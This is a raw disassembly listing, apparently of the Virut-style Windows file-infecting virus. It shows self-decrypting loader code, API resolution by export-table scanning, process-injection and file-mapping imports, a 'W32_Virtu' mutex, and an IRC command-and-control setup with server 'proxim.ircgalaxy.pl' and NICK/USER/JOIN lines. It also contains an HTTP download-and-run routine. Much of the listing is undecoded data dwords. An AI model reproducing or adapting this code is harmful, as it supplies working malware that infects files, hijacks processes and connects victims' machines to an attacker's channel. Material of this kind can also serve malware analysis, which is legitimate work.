dd 7023h, 20732523h, 6C756F63h, 6F6E2064h, 65622074h, 6C200000h
dd 7461636Fh, 69206465h, 6874206Eh, 2065h, 616E7964h, 2063696Dh
dd 6B6E696Ch, 62696C20h, 617200C0h, 25207972h, 6F512E73h
dd 1DD6472h, 6C616E69h, 1642520h, 615B4300h, 5D796Eh, 1000138Ch
dd 0BD638098h, 65737500h, 33720000h, 6C642E32h, 654D006Ch
dd 67617373h, 4265h, 41786Fh, 72707377h, 66746E69h, 656B0041h
dd 6E720B00h, 45226C65h, 50746978h, 73DD8056h, 0CAF0073h
db 0, 49h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebp
push ebx
push edi
push esi
add [eax-147EA45Bh], al
setalc
adc eax, [eax]
adc [ebx+0E8B0875h], cl ; CODE XREF: .rsrc:0040946D�j
add eax, [eax-0AE34F8h]
xchg eax, ebx
xchg eax, ebp
test eax, eax
jz short loc_409471
mov [eax], esp
add [ebp-4], eax
mov edx, [esi+4] ; CODE XREF: .rsrc:00409441�j
add edx, ebx
jle short near ptr loc_40943C+2
mov eax, [edx] ; CODE XREF: .rsrc:00409462�j
test [edx], eax
add al, al
jz short loc_409465
push edx
mov eax, [edx]
add eax, ebx
push eax
push dword ptr [ebp-4]
call dword ptr [ebx-7A51E000h]
sal byte ptr [esp+edx-55h], 5Ah
add edx, 4
jmp short near ptr loc_409443+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_409465: ; CODE XREF: .rsrc:00409449�j
add [ebx+68B0CC6h], al
test eax, eax
jnz short near ptr loc_409425+5
xor eax, eax
loc_409471: ; CODE XREF: .rsrc:00409435�j
jmp short near ptr dword_409478
; ---------------------------------------------------------------------------
db 0B8h
dd 56FFFFh
dword_409478 dd 5F5EFFFFh, 0C2C95D5Bh, 6E000004h, 8B087D8Bh, 5F8B0447h
; CODE XREF: .rsrc:loc_409471�j
dd 74C33B08h, 8B44h, 0F6853877h, 0F3033D74h, 0D82BD38Bh
dd 0ADFC5D89h, 0D88B0000h, 85ADDA03h, 8B2A74C0h, 8E983C8h
dd 0C985h, 0AD66ED74h, 0E781F88Bh, 0FFFh, 0C166FB03h, 0CE80000h
dd 3F88366h, 458B0575h, 490701FCh, 15887549h, 62CCEBE1h
dd 555F0600h, 0D2085D8Bh, 0A9ED815Dh, 8890014h, 3C4E8B10h
dd 8004AADBh, 83085667h, 0B70F48C3h, 18A90C43h, 1075E4C1h
dd 6F75D0A9h, 0FFA94601h, 7EEB6875h, 338B51h, 53085418h
dd 0EB8BC933h, 0E5BB70Fh, 0CF3B0000h, 68B4D7Dh, 1275FF3Ch
dd 7425FC80h, 8005h, 87515FCh, 8306C683h, 0E4EB06C1h, 0E74E83Ch
dd 0E93C0000h, 468B2975h, 0F8385701h, 8EB1875h, 8B57h
dd 0D8380146h, 0C1660E75h, 0C0C108E8h, 2BC48610h, 89C10000h
dd 835F0146h, 0C18305C6h, 46B3EB05h, 0EB41h, 0EB595BAFh
dd 8B575118h, 0FFA033Bh, 830E4BB7h, 2EC0000h, 57525166h
dd 16E8h, 83595F00h, 5610C3h, 0E9057449h, 0FFFFFF5Ch, 0D400045Dh
dd 8758B60h, 104D8B66h, 20C558Bh, 3071980h, 88966C2h, 0C961F4EBh
dd 1E2B0CC2h, 800800E6h, 100015FFh, 1591858Dh, 0D0C2D21Bh
dd 0A78B0889h, 48896105h, 22CC1604h, 16011649h, 2000A90Ch
dd 0E9407525h, 0A4h, 3F28B51h, 8B331980h, 84B84BDh, 0F9C1C18Bh
dd 0F3020014h, 83C803A5h, 0A4F303E1h, 9B60FC8Bh, 47B03FAh
dd 591B00F7h, 8B5D69EBh, 4087Dh, 163403h, 0F78B5110h, 8B30772Bh
dd 0C600A8FEh, 0C703574Ah, 10015256h, 0A68D8D5Ch, 84B8B51h
dd 8D8D89h, 5105B60Ch, 0D0FF5657h, 50A18B5Ah, 0E6E63C8h
dd 5F5E6678h, 4ED7B1EBh, 0B2383A38h, 16B70DC8h, 740D1500h
dd 0E083F259h, 5007402h, 738B514Ah, 4B8B8604h, 74000308h
dd 7B8B62F2h, 8BFA0304h, 84B02C3h, 0AAF3C033h, 1D083B82h
dd 17002610h, 7FADE285h, 0C758B56h, 5D8B0002h, 39C03308h
dd 4751046h, 2C740639h, 741C3000h, 8430303h, 30C4E8Bh
dd 84Bh, 85107E8Bh, 30374FFh, 5750087Bh, 19E85351h, 0
dd 0FFF88300h, 0C6830774h, 33C9EB14h, 22505EC0h, 0A6C2C9h
dd 5340A315h, 0AF193855h, 0C459986h, 83892704h, 89C033A2h
dd 0A4E66083h, 75FFB88Bh, 11FF0Ch, 0FC4589D2h, 7F74C085h
dd 10758Bh, 14557280h, 275D285h, 0F685D68Bh, 0F28B0275h
dd 0CA43E00Ch, 0C7100017h, 10384331h, 0B85249DEh, 0E1A94941h
dd 13808B0Ah, 0E2E28112h, 5D8B0BEBh, 1808B08h, 8530312h
dd 3E02C283h, 18092D58h, 10001311h, 900752h, 0C0855400h
dd 895A1174h, 83028906h, 0C68304C2h, 0EB0400B6h, 0EBC0339Bh
dd 63F5A06h, 0C95B5D05h, 0EF0063C2h, 748B6000h, 7C8B2424h
dd 5C8B2824h, 8BFC2C24h, 74DB851Bh, 3D2334Eh, 0FB3BA4DFh
dd 20E84573h, 73000000h, 27E8F4h, 0E8910000h, 21h, 41414848h
dd 0AC08E0C1h, 0F78B5640h, 0A4F3F02Bh, 66D7EB5Eh, 875D203h
dd 92AD6692h, 42D20366h, 40C033C3h, 0FFFFEAE8h, 0E8C013FFh
dd 0FFFFFFE3h, 2BC3F272h, 8928247Ch, 611C247Ch, 0C50010C2h
dd 5B000090h, 44000009h, 85000001h, 18000097h, 1C000090h
dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 4028DE00h, 4Bh dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_409A17
call sub_409A60
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409A17 proc near ; CODE XREF: start+3�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00409A8A SIZE 0000010C BYTES
; FUNCTION CHUNK AT 00409C04 SIZE 0000000A BYTES
sub eax, eax
loc_409A19: ; CODE XREF: sub_409A17+8�j
dec al
or al, al
jz short loc_409A23
jnz short loc_409A19
jmp short loc_409A8A
; ---------------------------------------------------------------------------
loc_409A23: ; CODE XREF: sub_409A17+6�j
sub edi, edi
sub ecx, ecx
mov cl, 4Dh
loc_409A29: ; CODE XREF: sub_409A17+14�j
inc edi
dec ecx
jnz short loc_409A29
call $+5
pop ecx
add ecx, 3Bh
xor edx, edx
or edx, 243Ch
push ecx
loc_409A42: ; CODE XREF: sub_409A17+37�j
mov al, [ecx]
sub ax, di
mov [ecx], al
inc ecx
inc edi
dec edx
or edx, edx
jnz short loc_409A42
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ecx
sub_409A17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409A60 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_409A60 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
; START OF FUNCTION CHUNK FOR sub_409A17
loc_409A8A: ; CODE XREF: sub_409A17+A�j
jz short loc_409AB9
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_409AB0
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_409AB8
; ---------------------------------------------------------------------------
loc_409AB0: ; CODE XREF: sub_409A17+8A�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_409AB8: ; CODE XREF: sub_409A17+97�j
pop ebx
loc_409AB9: ; CODE XREF: sub_409A17:loc_409A8A�j
push ebp
xchg eax, ebp
sub [esp+arg_0], 7195h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+arg_0]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_409AE0: ; CODE XREF: sub_409A17+E5�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_409AF6
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_409AFE
loc_409AF6: ; CODE XREF: sub_409A17+D0�j
sub ebx, 100h
jnz short loc_409AE0
loc_409AFE: ; CODE XREF: sub_409A17+DD�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_409B0C: ; CODE XREF: sub_409A17:loc_409B33�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_409B33
cmp dword ptr [eax+3], 636F7250h
jnz short loc_409B33
cmp dword ptr [eax+7], 72646441h
jnz short loc_409B33
cmp dword ptr [eax+0Bh], 737365h
jz short loc_409B38
loc_409B33: ; CODE XREF: sub_409A17+FF�j
; sub_409A17+108�j ...
loop loc_409B0C
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_409B38: ; CODE XREF: sub_409A17+11A�j
sub [esp+4+var_4], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_409B5E+2
inc ebx
insb
outsd
jnb short near ptr loc_409BBC+2
dec eax
popa
outsb
db 64h
insb
loc_409B5E: ; CODE XREF: sub_409A17+138�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_409B7A+1
inc ebx
jb short near ptr loc_409BD5+1
popa
jz short near ptr loc_409BD5+4
inc ebp
jbe short near ptr loc_409BDB+1
outsb
jz short near ptr loc_409BB9+2
loc_409B7A: ; CODE XREF: sub_409A17+152�p
add [ebx-1], dl
setalc
mov dword ptr ss:loc_403540[ebp], eax
call sub_409B96
inc edi
db 65h
jz short near ptr loc_409BD5+4
popa
jnb short loc_409C04
inc ebp
jb short near ptr loc_409C04+1
outsd
jb short $+2
; END OF FUNCTION CHUNK FOR sub_409A17
; =============== S U B R O U T I N E =======================================
sub_409B96 proc near ; CODE XREF: sub_409A17+16D�p
; FUNCTION CHUNK AT 00409C3F SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 00409D7F SIZE 0000013A BYTES
push ebx
call esi ; GetProcAddress
mov [ebp+403544h], eax
call sub_409C14
test eax, eax
jz short loc_409BC9
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_409BC3
lea eax, loc_4011D2[ebp]
loc_409BB9: ; CODE XREF: sub_409A17+161�j
mov dl, [eax-1]
loc_409BBC: ; CODE XREF: sub_409A17+140�j
call sub_409C2F
jmp short loc_409C3F
; ---------------------------------------------------------------------------
loc_409BC3: ; CODE XREF: sub_409B96+1B�j
; sub_409B96+136�j ...
call dword ptr [ebp+40353Ch]
loc_409BC9: ; CODE XREF: sub_409B96+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_409BF3
loc_409BD5: ; CODE XREF: sub_409A17+158�j
; sub_409A17+15B�j ...
lea esi, [ebp+403435h]
loc_409BDB: ; CODE XREF: sub_409A17+15E�j
mov edi, [esp+4]
movsb
movsd
mov ebx, dword ptr ss:loc_4039B2[ebp]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_409BF3: ; CODE XREF: sub_409B96+3D�j
pop ebp
retn
sub_409B96 endp
; ---------------------------------------------------------------------------
loc_409BF5: ; CODE XREF: sub_409C14+2�p
; sub_409B96:loc_409DFE�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_409A17
loc_409C04: ; CODE XREF: sub_409A17+177�j
; sub_409A17+17A�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; END OF FUNCTION CHUNK FOR sub_409A17
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 4
; =============== S U B R O U T I N E =======================================
sub_409C14 proc near ; CODE XREF: sub_409B96+9�p
xor ecx, ecx
call loc_409BF5
lea edx, loc_4011A1[ebp]
push edx
push ecx
push ecx
push eax
call dword ptr ss:loc_403540[ebp]
add esp, 20h
retn
sub_409C14 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409C2F proc near ; CODE XREF: sub_409B96:loc_409BBC�p
; sub_40BA03+25B�p
mov dh, dl
mov ecx, 225Fh
loc_409C36: ; CODE XREF: sub_409C2F+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_409C36
retn
sub_409C2F endp
; ---------------------------------------------------------------------------
db 0A8h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_409B96
loc_409C3F: ; CODE XREF: sub_409B96+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr ss:loc_401588[ebp], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_409C66: ; CODE XREF: sub_409B96+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_409C66
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, loc_4015BB[ebp]
xor ecx, ecx
lea edi, sub_403558[ebp]
mov cl, 1Eh
call sub_409FF9
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_409D7F
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov ss:dword_403550[ebp], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_409BC3
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset sub_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_409B96
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, loc_401A3D[ebp]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call ss:dword_403550[ebp]
add esp, 20h
test eax, eax
jz loc_409BC3
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call ss:dword_403550[ebp]
test eax, eax
jz loc_409BC3
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call ss:dword_403550[ebp]
push 1000Ah
call ss:dword_403550[ebp]
call sub_409D6F
jmp loc_409BC3
; =============== S U B R O U T I N E =======================================
sub_409D6F proc near ; CODE XREF: .rsrc:00409D65�p
; sub_409D6F+D�j
push 1
pop ecx
jecxz short locret_409D7E
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_409D6F
; ---------------------------------------------------------------------------
locret_409D7E: ; CODE XREF: sub_409D6F+3�j
retn
sub_409D6F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_409B96
loc_409D7F: ; CODE XREF: sub_409B96+10F�j
cmp dword ptr ss:loc_403570[ebp], 0
jz loc_409BC3
call near ptr loc_409D96+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_409D96: ; CODE XREF: sub_409B96+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_409DB3+5
inc eax
add [ebx], dh
leave
lea edi, loc_4035D0[ebp]
mov cl, 0Bh
xchg eax, ebx
call sub_409FF9
loc_409DB3: ; CODE XREF: sub_409B96+209�j
cmp dword ptr ss:loc_4035F8[ebp], 0
jz loc_409BC3
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, dword ptr ss:loc_4035E8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, dword ptr ss:loc_4035D8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_409DFE
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_409DFE: ; CODE XREF: sub_409B96+25D�j
call loc_409BF5
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, loc_40159F[ebp]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_409E43: ; CODE XREF: sub_409B96+2B0�j
lodsb
stosw
loop loc_409E43
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_409BC3
lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40144C[ebp]
jmp eax
; END OF FUNCTION CHUNK FOR sub_409B96
; ---------------------------------------------------------------------------
db 8Dh, 95h, 0E0h
db 18h
db 40h, 0, 52h
db 0FFh
db 95h, 9Ch, 35h
db 40h ; @
align 2
dw 16E8h
db 0
db 2 dup(0), 4Ch
aOokupprivilege db 'ookupPrivilegeValueA',0
db 50h, 0FFh, 95h
dd offset loc_403546+2
dd 354C8589h, 54500040h, 0FF6A206Ah, 35EC95FFh, 0C0850040h
dd 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h, 65530000h
dd 75626544h, 69725067h, 656C6976h, 56006567h, 354C95FFh
dd 0C48B0040h, 50565656h, 95FF5756h, 4035D0h, 5710C483h
dd 353C95FFh, 6A0040h, 95FF026Ah, 403570h, 128B9h, 0E12B9700h
dd 54240C89h, 0AC95FF57h, 33004035h, 3CA583F6h, 4036h
dd 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h, 74FFEE72h
dd 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h, 43DE893h, 0C9330000h
dd 3930E391h, 40363C85h, 81287500h, 0DAEC1h, 50545000h
dd 50505156h, 6895FF53h, 85004035h, 0F7459C0h, 82474FFh
dd 363C858Fh, 0ACE80040h, 53FFFFFDh, 353C95FFh, 98EB0040h
dd 128C481h, 0FF570000h, 40353C95h, 0FBE5E900h, 498DFFFFh
dd 58585800h, 29CE00h, 0D6500h, 3 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_409FF9 proc near ; CODE XREF: sub_409B96+100�p
; sub_409B96+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_40A004: ; CODE XREF: sub_409FF9+E�j
lodsb
test al, al
jnz short loc_40A004
loop sub_409FF9
retn
sub_409FF9 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc_0 db 'VirtualAlloc',0
aWritefile_0 db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetc_0 db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_40A394 proc near ; CODE XREF: sub_40A3CB+70�p
; sub_40A3CB+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_40A394 endp
; =============== S U B R O U T I N E =======================================
sub_40A3CB proc near ; CODE XREF: .rsrc:0040BE8D�p
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr ss:loc_4035A4[ebp]
test eax, eax
jz loc_40A477
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_40A477
mov ecx, dword ptr ss:loc_401588[ebp]
jecxz short loc_40A42F
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_40A42F: ; CODE XREF: sub_40A3CB+56�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_40A394
mov eax, dword ptr ss:loc_4035E8[ebp]
lea ecx, [edi+23E1h]
call sub_40A394
mov eax, dword ptr ss:loc_4035D8[ebp]
lea ecx, [edi+23E8h]
call sub_40A394
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_40A477
lea ecx, [edi+23F5h]
call sub_40A394
loc_40A477: ; CODE XREF: sub_40A3CB+16�j
; sub_40A3CB+4E�j ...
mov eax, edi
pop edi
retn
sub_40A3CB endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dw 0E855h
align 10h
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_40A55C proc near ; CODE XREF: sub_40ADC7+1B�p
; sub_40AF3F+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_40A55C endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
db 0FFh
db 0F0h, 2 dup(0)
db 0
align 2
aProxim_ircgala db 'proxim.ircgalaxy.pl',0
aNickCdljvubmUs db 'NICK cdljvubm',0Ah
db 'USER o020501 . . :-JOIN &virtu',0Ah
db 'Uč',0
align 10h
dd 0ED815D00h, 401DB4h, 157785C6h, 0FF000040h, 40359495h
dd 1FE8C100h, 1E6A3C74h, 3550B58Bh, 0AC590040h, 2A752E3Ch
dd 0FF3E8166h, 8D23751Dh, 403640BDh, 2768B00h, 0A566A557h
dd 336A858Dh, 858F0040h, 403390h, 0FA4689FAh, 0FBFE4E8Ch
dd 0CFE201B1h, 858D43EBh, 4015B1h, 6A006A50h, 0A495FF0Eh
dd 83004035h, 408247Ch, 4E82B75h, 53000000h, 0FF004346h
db 95h, 88h
word_40A89A dw 4035h ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 0FC48E800h, 7E8FFFFh, 53000000h, 4F5F4346h, 95FF0053h
dd 403588h, 0FFFC31E8h, 0F356E8FFh, 8DFFFFFFh, 401303h
dd 0BE8h, 45535500h, 2E323352h, 4C4C44h, 359C95FFh, 0AE80040h
dd 77000000h, 69727073h, 4166746Eh, 95FF5000h, 403548h
dd 35548589h, 310F0040h, 18E08D8Dh, 85890040h, 403646h
dd 9C95FF51h, 93004035h, 468h, 0EDB58D00h, 59004018h, 362CBD8Dh
